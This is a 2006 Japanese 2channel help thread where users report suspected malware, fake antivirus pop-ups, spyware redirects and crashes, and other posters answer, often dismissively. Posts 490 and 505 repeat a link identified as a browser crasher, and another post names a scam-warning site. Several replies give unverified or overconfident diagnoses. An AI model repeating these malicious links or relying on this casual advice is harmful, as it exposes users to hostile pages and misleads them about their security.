442 :名無しさん@お腹いっぱい。:2006/04/02(日) 03:29:17
>>440
バックライトの突然死?

443 :名無しさん@お腹いっぱい。:2006/04/02(日) 13:22:42
>>442
あっちのスレで解決したらしい
修理逝きの報告あり

444 :名無しさん@お腹いっぱい。:2006/04/02(日) 15:14:02
ノートン2006いれてます
接続を見るとlocalhost 1025 が沢山あります
問題ないのでしょうか?

445 :名無しさん@お腹いっぱい。:2006/04/02(日) 15:18:03
マルチはスルーする。

446 :名無しさん@お腹いっぱい。:2006/04/03(月) 01:09:07
ついさっき、
いきなりメッセンジャーで音楽データを送信してきた友人が、
ウイニーなどを使用していると知りました。

そのデータを解凍した後に、
上記の事を知り、いろいろと聞いたところ、
送られてきたデータはウイニーでダウンロードしたそうです。
送った本人は、大丈夫と言っていましたが、信用できません。

私は、ウイニーなどは使用していません。
この場合、私がキンタマ・山田ウイルスなどに感染している可能性はありますか?

そのファイルをマカフィー最新版でウイルスチェックしたところ、
ウイルスは発見されませんでしたが、
マカフィーなどでは検出されないみたいなので、
今は心配です。お願いします。

447 :名無しさん@お腹いっぱい。:2006/04/03(月) 01:32:04
>>446
マカフィーウイルスチェックで大丈夫だったらウィルスに関してはOK
ファイヤーウォールは信用できないけど

448 :446:2006/04/03(月) 02:31:21
>>447さん、ありがとうございます。

外付けHDDも含め、改めてウイルススキャンした結果も大丈夫でした。

マカフィーのファイヤーウォールはイマイチなのですか…。
ファイヤーウォールがついているルータを使用しているので、
そのあたりは大丈夫だと思っています。

449 :名無しさん@お腹いっぱい。:2006/04/03(月) 07:32:43
※ウイルス警報

Optix系ウイルスの亜種が出現したようです。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FOPTIX131%2EA
これはサーバー=クライアント型のハッキングツールです。サーバープログラムとクライアントプログラムに
分かれて動作します。サーバープログラムはトロイの木馬としてマシンのシステムに潜入します。
ハッカーはクライアントプログラムを使用してサーバープログラムが潜入したマシンをリモートコントロールできます。
他のファイルへの感染活動は行いません。このようなハッキングツールを一般に「バックドア型」と呼びます。
これは、OPTIXとよばれるハッキングツールシリーズの一つです。


アンチウイルス製品の中では、NOD32が未対応のようなのでご注意ください。
http://vista.x0.to/img/vi4377115328.jpg


450 :名無しさん@お腹いっぱい。:2006/04/03(月) 12:59:12
TORJ_SMALL.VC とゆうウィルスが見つかりました。
検索しても対処方法がわかりません。
ご存知の方、よろしくお願いします。

451 :名無しさん@お腹いっぱい。:2006/04/03(月) 17:24:58
私が使っているブログにプリクラで撮ったような写真を貼り付けられていました。
どうやってやったのか不明です。
怖いです。スキャンはしたが問題なく。ウィニーも使っていません。


452 :名無しさん@お腹いっぱい。:2006/04/03(月) 17:40:02
>>450
アンチウィルスを入れる
>>451
家族

453 :名無しさん@お腹いっぱい。:2006/04/03(月) 18:00:13
貴方のパソコンはブラックウォームに感染する恐れがあります
ごらんのセキュリティソリューションをダウンロードするのをお薦めします
と出たのですけどダウンロードするべきなのでしょうか?
ファイル名 WinAntiVirusPro2006FreeInstall_jp.exe
発行元 download.winantivirus.com
スレ違いだったらごめんなさい

454 :名無しさん@お腹いっぱい。:2006/04/03(月) 18:06:26
>>453
そうやってなんでもインストールするからニュースになるんだな。
少しは頭使え。

455 :名無しさん@お腹いっぱい。:2006/04/03(月) 18:15:20
>>453
http://jp.winantivirus.com
とりあえずここへ行って何か胡散臭さみたいなものを感じとってみよう


456 :名無しさん@お腹いっぱい。:2006/04/03(月) 19:20:01
山田に感染してうか心配です
確かめる方法はないのでしょうか?

457 :名無しさん@お腹いっぱい。:2006/04/03(月) 19:24:09
>>456
ttp://www9.atwiki.jp/y_altana/pages/1.html

458 :名無しさん@お腹いっぱい。:2006/04/03(月) 22:59:55
jpをdeとかfrにすると、ドイツ語やフランス語のバージョン
になるな。商売熱心な人たちですねww



459 :名無しさん@お腹いっぱい。:2006/04/04(火) 02:18:52
携帯からで悪いんだけど俺>>453の奴に引っ掛かってインストールしちゃったんだけど大丈夫かな?
その後なんか妖しいと思ってすぐアンインストールしてウイルススキャンしてみたけど以上は無かった
PCの知識まったくないんで不安なんだ

460 :名無しさん@お腹いっぱい。:2006/04/04(火) 07:46:23
>>459
ポップアップが出てなければ大丈夫じゃない?
http://www.higaitaisaku.com/vundofix.html

念のため
http://www.higaitaisaku.com/removewinfixer.html

461 :459:2006/04/04(火) 14:30:34
ポップアップは出てないし>>460のサイト見た感じこれは特に悪質なもので無いっぽいのな
サンクス安心した

462 :名無しさん@お腹いっぱい。:2006/04/04(火) 21:45:22
はじめまして。教えてください。
カボスで音楽をダウンロードしていたら、突然ピーという音とともに
音楽が消え、AOLのインストーラーがたちあがりました。
その後、パソコンを立ち上げるたびにインストーラーがたちあがり、
1度インストールしたんですが、その後何度もたちあがってきます。
なにかのウィルスですか??解決方法はありますでしょうか??
初心者なもので、どうしたらいいのかわかりません。
ノートンのウィルスチェックは検出されませんでした。
よろしくお願いします。

463 :名無しさん@お腹いっぱい。:2006/04/04(火) 22:14:50
>>462
AOLのインストーラー・・・必要ですか?
ISPが他社なら不要ですね
つttp://support.aol.co.jp/howto/ho_instmacx.html
削除方法がわからなければ、上記サイトを参照
その上で不具合が出るようなら
スパイウェアのチェックもして見ましょう

464 :エボニー嫌い:2006/04/04(火) 22:22:16
こないだまでウィルス(スパイウェア?アドウェア?)に悩まされていました。
解決はしたものの、なんだったのか知りたく、ご存じの方に教えを請いたいと思います。


【使用OS】 WinXP
【WindowsUpdateしてるか】 してなかった
【AntiVirusは何を使っているか】 NortonAntiVirus2002
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 コンピュータすべて
【別のオンラインスキャンしたならその結果は】 Trojan,ebony、Trojan***など、を複数検出
【症状を具体的に、分かる限りすべて書く】 危険度「高」のセキュリティエラーダイアログが表示され、ebony-heaven.comなるサイトに自動でジャンプされる。
また、タスクマネージャが使用不能になる。

【何をしたらそんなことになったのか】 2chであやしいリンクを踏んで以降
【これまでにとった措置】 NAV2002では自動駆除駆が出来ないとのことで、手動駆除方法を調べ、不正プログラムのアンインストール、レジストリの修正、一時ファイル、クッキーを削除。 WinUpdateの実施(SP2へ)と今後のことも考えNIS2006を導入。
ebony-heavenのサイト表示は続いたので、NIS2006、Ad-Aware、spybotsにより駆除を試み、一応の解決をみる
【その他の質問】
不正プログラムによるサイト自動移行がどのような働きで行われているのか、およびその対処方法はどのようなものがあるのか、についてお教え頂ければと思います。


465 :名無しさん@お腹いっぱい。:2006/04/04(火) 22:22:20
>>462
P2Pの話題はDownload板いけや。

466 :名無しさん@お腹いっぱい。:2006/04/05(水) 01:15:57
トレンドマイクロで定期スキャンをしたら「TROJ_BOOKMARK.S」というウイルスに感染したと表示されました。
リンク先を辿っても無いと言われ、
駆除出来ないのでウイルスバスターで検索するも検地しません。
TROJ_BOOKMARK.AやらGはありますがSだけ有りません。
TROJ_BOOKMARK.Sの駆除情報を知っている方居たら駆除方法教えて下さいませ。

467 :名無しさん@お腹いっぱい。:2006/04/05(水) 02:33:37
>>464
本来は「大アホ」の一言で終わりだが・・・

とりあえず NortonAntiVirus2002 がいつ時点までのウィルスパターンに対応しているか調べろ

  お約束の  新しいNorton買えよ貧乏人!!

468 :名無しさん@お腹いっぱい。:2006/04/05(水) 06:24:47
>>464>>466
ノートン2006買ってくださいね

469 :名無しさん@お腹いっぱい。:2006/04/05(水) 06:53:49
>>467
>>464
ちゃんと読んであげろよ…

470 :名無しさん@お腹いっぱい。:2006/04/05(水) 06:54:49
まちがった>>467>>468

471 :名無しさん@お腹いっぱい。:2006/04/06(木) 08:48:29
スレ違いかもしれませんが、該当すると思うようなスレが無いのでここで質問させて頂きます。
「NIS2005」と「ZoneAlarm Free+NOD32」
上の組み合わせではどちらの方が、どれくらい重いんでしょうか?

472 :名無しさん@お腹いっぱい。:2006/04/06(木) 10:59:31
本当にスレ違いだなw


473 :名無しさん@お腹いっぱい。:2006/04/06(木) 17:31:16
>>471
いっぺん両方それぞれ入れてみてから、PCを手で持ち重さを比較汁!w

474 :名無しさん@お腹いっぱい。:2006/04/06(木) 20:46:19
それはいい方法ですね!
試してみます!

475 :464:2006/04/06(木) 21:39:52
>>467

ありゃ。大アホでしたかな。 定義ファイルを更新していたらよいものとばかり。

今回NIS2006をインストールしたのですが、以前にNIS2005のインストールを試みたことがあり、
そのときは、PCの動作が極端に冗長になったのでアンインストールし、バージョンダウンして
NAV2002を使っていたのですな。 だもんで、金をケチってるわけではないです。

と、マジレスしてもしかたないか。 二度とこないし。 感じ悪いから。


476 :名無しさん@お腹いっぱい。:2006/04/06(木) 23:18:46
>>475
おまいのPCが時代遅れなだけじゃん
つうか、物持ちのいい方ですね。ってお世辞いっとこうかw

ついでにおまいのお頭も時代遅れ!!!

477 :名無しさん@お腹いっぱい。:2006/04/06(木) 23:32:10
>>475
467の返事も悪かったか知れんが、放置されたほうがよかったのか?
何にしろ、自分で「NIS2006、Ad-Aware、spybotsにより駆除を試み、一応の解決をみる」と
書いていて「サイト自動移行がどのような〜およびその対処方法は」と聞くのは
「NIS2006、Ad-Aware、spybots」はどうやって、何をしたんですか?と聞いているのと
同じでは?
それを「感じ悪いから」って・・・NIS06のせいで「極端に冗長に」なるようなPCで
「金をケチって」るんじゃないならPCのスペックあげたら?
・・・と他人事な上に「二度とこない」奴にマジレス(w


478 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:10:22
ttp://hagekaketal.com

にアクセスしたらウィルスに感染しましたと出て
なにかダウンロードするように出たんですがこれはウィルスに感染したんでしょうか?

479 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:15:08
>>478
誰が感染したといったか、それで君がどうしたかによる

480 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:19:46
>>479
インターネットエクスプローラなんとかって書いてたウィンドウに
感染したからダウンロードするようにって感じで出て別のタブにこれをダウンロードしろと出たのですが

とりあえず何もダウンロードせずにSleipnirを閉じました

481 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:36:17
>>480
一応「Temporary Internet Files」、気になるなら
PCスキャンしてみれば?

482 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:45:35
>>481
Temporary Internet Filesの中に何があったらまずいんでしょうか?

483 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:58:20
何か。
ファイル。
プログラム。
あやしいもの。
ぜんぶ。

484 :名無しさん@お腹いっぱい。:2006/04/07(金) 00:59:22
>>482
ウィルスによって違うんじゃないか?
ファイル名やプログラム名を期待してるなら
この世から「亜種」は無いのと同じ

485 :478:2006/04/07(金) 01:13:43
Avast!でスキャンして何も見つかりませんでした
とりあえずオンラインスキャンを何箇所かやってみます


486 :名無しさん@お腹いっぱい。:2006/04/07(金) 08:25:59
       ∧_∧
       ( ・∀・) ドキドキ
     oノ∧つ⊂)
     ( ( ・∀・) ワクワク
     oノ∧つ⊂)
     ( ( ・∀・) ニヤニヤ
     ∪( ∪ ∪
       と__)__)
       (0゚・∀・)   ワクワクテカテカ
   +.   (0゚∪ ∪ +
     /ヽと__)__)_/ヽ   +
    (0゙   ・   ∀ ・ ) ワクワクテカテカ
    (0゙     ∪    ∪     +
  /ヽと____)___)_/ヽ   +   +
 ( 0゙     ・    ∀   ・  ) ワクワクデカデカ
 ( 0゙     ∪   ∪     +
 と_______)_____)


487 :名無しさん@お腹いっぱい。:2006/04/07(金) 12:33:57
(?も?)

488 :名無しさん@お腹いっぱい。:2006/04/07(金) 14:44:34
>>156
亀レスになるが、踏んでみたらノートンはファイル削除したけど
スクリプト動作までは止めてくれなかったよ

489 :名無しさん@お腹いっぱい。:2006/04/07(金) 20:51:58
ウイルスやらBOT対策としてのフィルタリングの設定についてのスレッドってありますかね?

490 :名無しさん@お腹いっぱい。:2006/04/07(金) 22:16:18

すみません、先程こちらを誤って踏んでしまったのですが
どんなウィルスなのか分かりますでしょうか?
    ↓
ttp://ani.atz.jp/ip/ip2.cgi?file=06040700427.zip

491 :名無しさん@お腹いっぱい。:2006/04/07(金) 22:21:20
















492 :名無しさん@お腹いっぱい。:2006/04/07(金) 22:51:20
>>490
厨房ホイホイっていうブラクラと同一のもの
ブラクラだから一回限り

493 :名無しさん@お腹いっぱい。:2006/04/07(金) 22:56:16
>>492
ノシ

494 :名無しさん@お腹いっぱい。:2006/04/07(金) 23:49:12
【使用OS】  WinXP
【WindowsUpdateしてるか】  SP2の一歩手前まで
【AntiVirusは何を使っているか】  たまのオンラインスキャン
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】  何も出ない
【別のオンラインスキャンしたならその結果は】  何も出ない
【症状を具体的に、分かる限りすべて書く】
 Windows起動時に変な英語の検索型サイトが全画面でIEXPLORE.exeとして起動される
 先日は検索ボックス内にporno gamesのような文字が表示されていた

【何をしたらそんなことになったのか】
 数日前より、全く知らない間に

【これまでにとった措置】
 ファイル・レジストリ検索→C:\Program Files\Internet Explorerのみ
 各種オンラインスキャン→全く反応なし
 SpyBot/XoftSpy→全く反応なし

【その他の質問】
 ワーム・ウィルスの類なのか、ただのスパムプログラムのどちらでしょう?

495 :名無しさん@お腹いっぱい。:2006/04/07(金) 23:55:37
>どちらでしょう?

【WindowsUpdateしてるか】  SP2の一歩手前まで
【AntiVirusは何を使っているか】  たまのオンラインスキャン
【ちゃんとUpdateしてるか】

  こんな奴には教えたくないな。 おとといきや(ry

496 :名無しさん@お腹いっぱい。:2006/04/08(土) 00:25:41
>>495
       /j^i
      ./  ;!
     /  /__,,..
    /  `(_t_,__〕
    /    '(_t_,__〕  GoodJob!!!
   /    {_i_,__〕
  /    ノ  {_i__〉
/      _,..-'"
      /

497 :名無しさん@お腹いっぱい。:2006/04/08(土) 00:28:23
>>494

              _,-‐‐、
            ,i´    l、__   _,.....、
             l   ‐-/´ `y‐'´  ヽ__
             !、__,...-'!、__,ノー     ノ ``ー 、_  ,
          /      ヽ、   ノ‐- 、__   `く-、
         /         `ー‐'´`-、   `ー-、 |
          '--、__________,.........-----‐‐'ー、_    `ー、
          ,i ,-、‐‐-- 、ニ二`ー‐- 、  ,l´ ` 、  ヽ)
         /.´,-!      7`i_ー  |    ヽ __ )
      _,.-‐‐ (   __    `i      ヽ  _,i'´ ヽ
     i´   -‐'_フ'´ノヽ、____,i´       ヽ'´ ,く  |
     !、_______,.......,--、_`  ヽ、    、 、      ノ
    (\(\ !、_____|    ̄`ー-、___   ,ヽ ヽ -、-'´ i´`i , ^,
  ⊂ニ メ'  \\        |___ ``7'´ | ヽ  ,l   | `' 、r''´)
  ⊂ニ(   / `、 `ー、_  ,- 、  __ ̄   /     ノ,-'´|´   ヽ‐'、
   ⊂ -―/  `ー-、.`ー!、 Y ´ )_,.i'´   ノ   |    '‐く
       `ー、  ,  `ー、-、___    ___,.-‐´    ヽー-‐'`ー´
         `ー/    /ー-ュ‐' ̄ ̄      _,-‐'´
          /-、_   l_ 8 /      _,..-‐''´
      ,.-‐-、/  /`ー-、 ̄        _/
    ,/ `ー、,l`i /__   / ̄``7ー-‐'´/____
  ,i'´``ー-、 ノ_,/‐'´ `ー、     /   /‐--、`ニ‐、_
  ,!``ー- 、 ノ /        `、___/_______/i    ̄((`、ヽ
. | `ー-、/ ,!        ヽ    ,i' `ヽ__     ヾ .)`i
  `ーt_´ ,-f,.--‐‐'´`ー、___   _,i'´   ヽ`ー==ニ-'_ノ
     ̄         `二 ̄    _,-‐'´    ̄
          それでいいのだっ♪

498 :名無しさん@お腹いっぱい。:2006/04/08(土) 11:31:41
>>104

稀に起こる Windows XP の不具合です。
削除しようとしても削除できませんし、放置しておいて実害はありません。
気になる場合は、下記の方法で通常の状態に戻せるようです。

1. 適当なファイルを削除します。
2. ごみ箱を閉じた状態でごみ箱を空にします。
3. PC を再起動します。
これと類似した現象で、ごみ箱が空になっているのにもかかわらず、
アイコンの表示がごみのある状態のままになることがあります。
その場合も、一度何かてきとうなファイルを削除し、ごみ箱を空にしなおすことで解決するようです。


499 :名無しさん@お腹いっぱい。:2006/04/08(土) 12:17:36
これ不具合だったのか!僕も全く同じなんだが

500 :名無しさん@お腹いっぱい。:2006/04/08(土) 12:31:04
【使用OS】 WIN98
【WindowsUpdateしてるか】 していいない
【AntiVirusは何を使っているか】 不具合後オンラインスキャン(トレンドマイクロ)
【ちゃんとUpdateしてるか】 していない
【スキャンした結果(ウイルス名・発見場所)】見つからない
【別のオンラインスキャンしたならその結果は】 見つからない
【症状を具体的に、分かる限りすべて書く】
パソコンでインターネットをしてると突然マウスが走り出し画面のはじを高速で
移動しブラウザの画面を小さくしたり、見ていたブラウザが面をの上にある×マークを
勝手に押してブラウザをとじてしまったり、お気に入りのブックマークを勝手に選択して
そのサイトに勝手にクリックして移動したりする。
とにかく、突然マウスの矢印がブラウザ画面のはじっこをすごい早さで走り出す。
まるで誰かに操られているように。
【何をしたらそんなことになったのか】
推測だがおととい、「もうだめぽ」というフラッシュを落としてからだと思う。
【これまでにとった措置】 ウィルスバスターをもっていなのでオンラインスキャンしただけ。

【その他の質問】
これって完全になんかウィルスに感染したんだよね?スキャンしてもでてこないけどさ。
もう、再セットアップしかないのかな。でももうふるいPCだからそんなことするくらいなら
買い換えるけどさー、データーの引っ越しが面倒なんだよなあ・・・




501 :名無しさん@お腹いっぱい。:2006/04/08(土) 13:10:45
>>104
あるあるwww
解凍したデスクトップにあるフォルダーが再起動しないと削除できないのは毎回だw

502 :名無しさん@お腹いっぱい。:2006/04/08(土) 13:27:38
>>500おめ
ウィルスってより完全に侵入されてるのと違うか?www
おまい、ログインパスワードも設定してねえだろ?w
もうダメボ、おまいのPC、おまいのじゃなくなってるぜ!禿藁

セキュケチってるようじゃ、おまいは既に死んでいる!www

503 :名無しさん@お腹いっぱい。:2006/04/08(土) 14:08:59
ちんぽっぽウィルスに感染しちゃいました(><;)
誰か助けてください(;><)

504 :名無しさん@お腹いっぱい。:2006/04/08(土) 14:42:25
ちんぽっぽウィルスに該当するページが見つかりませんでした。

検索のヒント
キーワードに誤字・脱字がないか確かめてください。
違うキーワードを使ってみてください。
より一般的な言葉を使ってみてください。

505 :名無しさん@お腹いっぱい。:2006/04/08(土) 16:57:42
ttp://ani.atz.jp/ip/ip2.cgi?file=06040700427.zip

これ踏んだんですけど大丈夫ですか?

506 :名無しさん@お腹いっぱい。:2006/04/08(土) 17:01:51
>>505
http://pc8.2ch.net/test/read.cgi/sec/1014729406/
ブラクラ踏んでしまいました(*_*)

507 :名無しさん@お腹いっぱい。:2006/04/08(土) 18:58:00
>>500
乗っ取られているね・・・乙ですた!

508 :名無しさん@お腹いっぱい。:2006/04/08(土) 19:53:39
ハードディスクの中 からっぽじゃ ウイルスかにゃ?

509 :名無しさん@お腹いっぱい。:2006/04/09(日) 12:41:47
>>505
これ気になってるんですが普通のブラクラと違ってメールソフト立ち上げて
それ以外にも何か通信しようとするんですが・・・。


510 :名無しさん@お腹いっぱい。:2006/04/09(日) 15:42:45
ネットに接続していないと、二、三分ごとに、
can't resolve hostname to IP addressという
エラーメッセージが出るのですが、これはウイルスでしょうか?

511 :名無しさん@お腹いっぱい。:2006/04/09(日) 15:48:13
>>509
ニュースストームっていうブラクラも入ってんだよ
いたって普通のブラクラ
通信させても失敗するから問題なし

512 :名無しさん@お腹いっぱい。:2006/04/09(日) 15:57:31
>>508
自分で消したor初めから何も無い
>>510
DNSがおかしい・・・スパイウエア?
確認シル

513 :名無しさん@お腹いっぱい。:2006/04/09(日) 16:59:54
>>511
ありがとうございました。

514 :名無しさん@お腹いっぱい。:2006/04/09(日) 17:32:59
【使用OS】  WinXP
【WindowsUpdateしてるか】  最新までしてありました
【AntiVirusは何を使っているか】  Norton2006、月2くらいで
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】  McAfeeのオンラインスキャン
                        UnSpyPC.dr(1)とDownloader-ASI(9)計10
【別のオンラインスキャンしたならその結果は】  何も出ない
【症状を具体的に、分かる限りすべて書く】
  今のとこないと思います。

【何をしたらそんなことになったのか】
 サイトを巡回中、ノートンの警告。
 他にもいくつかウィルスがあったようですが、それはノートンで探知、駆除できた。 

 各種オンラインスキャン→McAfeeにて探知

McAfeeのオンラインスキャンでUnSpyPC.drとDownloader-ASIとかいう脅威名のウィルスに感染してるって出たんだが
ノートン2006で完全スキャンしても探知しない、いろいろくぐってみたが駆除の仕方がわかりません教えてください。

515 :514:2006/04/09(日) 17:34:00
月2くらいで「完全スキャン」の部分が抜けてました

516 :名無しさん@お腹いっぱい。:2006/04/09(日) 21:52:01
>>514
ノートンを信用すればいいじゃないか
それ以上のことが出来るのは、システムに精通していてレジストリから何から自分で検証出来る人だけ

517 :名無しさん@お腹いっぱい。:2006/04/09(日) 23:23:11
【使用OS】XP Home
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスターつかってます
【ちゃんとUpdateしてるか】 自動でしています
【スキャンした結果(ウイルス名・発見場所)】 Winlogon Trojan
【症状を具体的に、分かる限りすべて書く】いきなり強制終了されました
【何をしたらそんなことになったのか】ゲームをしていたらなりました
【これまでにとった措置】 分からないので何もしていません
【その他の質問】 ウイルスバスターでは検出されませんでした。これはなぜなんでしょうか?


518 :名無しさん@お腹いっぱい。:2006/04/09(日) 23:40:21
>>517
【AntiVirusは何を使っているか】 バスターのバージョン不明
【その他の質問】 最初からない(誤反応)か、対応していない
どうにかしたいなら「ぐぐる」
つttp://www.higaitaisaku.com/vundofix.html

519 :名無しさん@お腹いっぱい。:2006/04/09(日) 23:46:09
>>518
2005とかでいいんでしょうか?
EMCOのスパイウェア検出のソフトでは出るんですよ
いま、マイクロソフトの悪意のあるソフトの検出とかいうの試しています

520 :名無しさん@お腹いっぱい。:2006/04/09(日) 23:49:54
どっかで聞いたウイルス名だと思いきやWinfixer系か

521 :名無しさん@お腹いっぱい。:2006/04/10(月) 00:12:19
>>519
おk
【その他の質問】 
スパイウェア検出ソフトに反応してバスターで検出されないなら
バスター2005はスパイウェアに対応してないってことにならないか?
【スキャンした結果(ウイルス名・発見場所)】 
Winlogon Trojan=スパイウェア

520氏が良い事言った!

522 :名無しさん@お腹いっぱい。:2006/04/10(月) 00:21:41
>>521
Winfixer調べてみたんですが分からないです・・・。すみません。
悪意のある(ryでやってみたんですが、出ませんでした。
ウイルスバスターのスパイウェア検索でも出ないんですよ。
それで安心してたんですけど、EMCOを試したら出てきて削除も出来ない。
そしたら、今日いきなり強制終了してどうすればいいかと。
調べてみたんですけど、よく分からないんです。
>>518さんの教えてくださったところの下のソフト使えばいいんでしょうか?


523 :名無しさん@お腹いっぱい。:2006/04/10(月) 00:54:48
>>522
他のソフト(SpybotやAd-aware)試してみたら?
いきなり強制終了では不安だろうし・・・
(リカバリィorクリーンインストールを勧めるがね)

524 :名無しさん@お腹いっぱい。:2006/04/10(月) 08:30:30
Winfixerならアダルト被害対策っていうサイト行くよろし
俺も感染したけど勝手にインスコされたアプリをアンインスコして
SpybotとかAd-awareでチェックその後レジストリいじる能力無いから
システム復元でなんとかなった

525 :名無しさん@お腹いっぱい。:2006/04/10(月) 14:58:44
>>524
518で紹介してる

526 :>>517:2006/04/10(月) 20:14:17
そのサイトにあるとおりにやってみたんですけど、検出されませんでした
ウイルスバスターも2006にしてみたのですが、そちらでも・・・・
でも、EMCOでは検出されますし、再起動勝手にされます。
もうクリーンインストールしかないんですかね?


527 :名無しさん@お腹いっぱい。:2006/04/10(月) 20:17:47
CRINETとかゆーのに感染してたので削除した
そしたら気のせいかサイトに繋がるのも安定したと思う
最近なんか不安定だった
特に2chに繋がるのが異常に遅かった
まだ様子見ないといかんだろうが
ゐルス最悪だな本当

528 :名無しさん@お腹いっぱい。:2006/04/10(月) 20:29:20
何故感染したかを知らないと、また罹るぞと・・・

529 :名無しさん@お腹いっぱい。:2006/04/10(月) 20:36:49
怪しいブラクラ踏んだ
あとスパイウェアかもしれん
ネット接続しだして2ヶ月ほどのPCだがまだそっちの対策してないし
一度トロイはガードしたし変なサイトは行かない事にしている

530 :名無しさん@お腹いっぱい。:2006/04/10(月) 21:20:54
行ってるじゃん

531 :名無しさん@お腹いっぱい。:2006/04/10(月) 21:30:44
>>526
どれくらいの間隔で再起動するの?
カウントダウンとか出る?
ブラスター系にかかってる可能性もあるのでは?

532 :>>517:2006/04/10(月) 21:49:25
>>531
今のところは昨日の一回と先週に2回ぐらいでしょうか?
以前初期化する前にもあったんですがそのときは1時間に一回とかでした。
カウントダウンは出ません

533 :名無しさん@お腹いっぱい。:2006/04/10(月) 22:35:37
>>532
パッチ未適用なら、135オープンだと即効でネットワークワームにスパイウェアを放り込まれるけど、
その頻度だと445の方だろうな
こっちだとパケットは頻繁に飛んでくるけど、lsassが落ちるのはたまにだからな。
でも、バカだねえ。

534 :>>517:2006/04/10(月) 22:45:19
>>533

ウインドウズのアップデートと、バスターだけじゃだめなんですか?

535 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:12:57
>>534
WindowsUpdateは最新になってるの?
だとすると、ネット閲覧などでスパイウェアをインストールされた可能性が高い
いずれにしても、rpcssかlsassでのsvchostの異常終了だから、駆除しなければならない
何かをインストールされているのは間違いない

536 :>>517:2006/04/10(月) 23:17:13
>>535
自動でダウンロードするようにしてるので最新のはずです

537 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:19:09
>>534
あっ カウントダウンのメッセージは出ないと書いているのね
一瞬青画面にもならないのならハードウエアの異常の可能性が高い
青画面になるのならドライバ異常

538 :>>517:2006/04/10(月) 23:26:27
>>537
エラーが出て再起動したあとにマイクロソフトのリンクがでてウイルス名とかが表示されてました


539 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:30:22
>>536
EMCOでのみ検出される不思議さ?
537氏の「ハードウエアの異常の可能性」を
支持するがな・・・


540 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:36:25
>>536
上からずっと見て来たんだけど、どうもlsassの異常終了だと思うね
これは、カウントダウンメッセージを表示しないでいきなり再起動だったと思う
原因はレジストリ内のHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogonに自動起動するように書き込まれたスパイウェアかトロイ
スパイウェア系の駆除ソフトでセーフモードでスキャンすれば駆除出来ると思う

541 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:48:42
>>536
あっ、Winlogonに設定されているとすると、レジストリから最初に削除しないとセーフモードでも実行されてしまうかな?
だとすると、レジストリを削除して再起動してから本体ファイルを削除だな
たぶん、aw-awareとかでセーフモードで2回スキャンすれば駆除出来るのかな?
無理だったら手動で設定されているレジストリを削除する

542 :名無しさん@お腹いっぱい。:2006/04/10(月) 23:55:33
>>538
そういう詳しいことを最初から書いてよ。
どんな感じのエラーでなんと表示されたとか。

543 :>>517:2006/04/10(月) 23:55:34
>>541
ありがとうございます。
いわれたとおりにやってみます

544 :>>517:2006/04/10(月) 23:56:53
>>542
すみませんでした。
焦ってちゃんと書けてませんでした

545 :よろしくお願いします:2006/04/11(火) 14:15:57
【使用OS】
XP SP2
【WindowsUpdateしてるか】
常に行っています
【AntiVirusは何を使っているか】
ノートン英語版2005アップデートしています
【ちゃんとUpdateしてるか】
しています
【スキャンした結果(ウイルス名・発見場所)】
特に異常なし
【症状を具体的に、分かる限りすべて書く】
突然ブートしなくなりました。"press a key to reboot"と表示されます。
再インストールしましたが、同じです。fixmbrも行いました
別のドライブから見てみると、個別のデーターフォルダーでadministrator権限のある自分の
フォルダが開けません。セキュリティータブでは、訳のわからないユーザー名"S-xxx-33333”といった番号
が現れています。
アクセス権限がないため、ウィルススキャンもこの内部は行われていないようです。
【何をしたらそんなことになったのか】
少し前にUSBドライブを挿入しても認識されなくなり、ドライブの割り当てを行いました
しかし認識されず、リブートしたらこういう症状になりました
【これまでにとった措置】
再インストール、fixmbrなど
【その他の質問】
ドライブの割り当てをやったのが何らかの異常を起こしたのか?とも思いますが
ユーザーフォルダーのアクセス権が変になったことといい、とてもウィルスっぽいと思っています


546 :名無しさん@お腹いっぱい。:2006/04/11(火) 14:27:18
>>545
ググレ池沼

547 :よろしくお願いします:2006/04/11(火) 14:34:19
>>546
ぐぐりましたけど、うまくヒットしないんですよ
検索ワードをどうしたらよいのか


548 :名無しさん@お腹いっぱい。:2006/04/11(火) 18:44:46
このサイトを見たらWinFixerのサイトに行ってしまったんですけど、これはサイト側に何か問題があるのでしょうか?
インチキスパイウェアソフトはインストールせず、
履歴は一応全部削除したんですけど、これで大丈夫でしょうか?

tp://www.sherdog.com/fightfinder/fightfinder.asp?fighterID=425

549 :名無しさん@お腹いっぱい。:2006/04/11(火) 23:09:19
>>545
safeモードでも起動できないの?

550 :545:2006/04/12(水) 01:26:50
>>549
できません。safeモードはおろか、ブートしませんから。
"press a key to reboot"
と表示されるだけです。

551 :不安です:2006/04/12(水) 01:49:53
【使用OS】 Windows2000
【WindowsUpdateしてるか】最新にしています。
【AntiVirusは何を使っているか】Norton Internet Security2005
【ちゃんとUpdateしてるか】最新にしています。
【スキャンした結果(ウイルス名・発見場所)】
「Trojan Horse」と言う名前でファイル実行時にはNortonに引っかかったのですが
そのフォルダ(厳密にはCドライブ全て)を再度スキャンするとまったく引っかかりませんでした。
【症状を具体的に、分かる限りすべて書く】
上記スキャンした結果の後、問題なかったのかなと再起動しましたところ
起動時にWindowが沢山開かれて、ゴキブリの絵が出てきました。
【何をしたらそんなことになったのか】 install.exe
【これまでにとった措置】
とりあえずなんのファイルがこの動作を起こしているのかは一度Nortonにて検出して
いましたので、@セーフブートでそのファイル(exe)を手動で削除し、
A起動時にこのファイルを読み込んでいたので、スタートアップのショートカットを
手動で削除。
【その他の質問】
上記対応で、治ったかに見えるのですが、
これで問題がないのか心配なので、どなたか問題があるかおわかりになりますでしょうか?
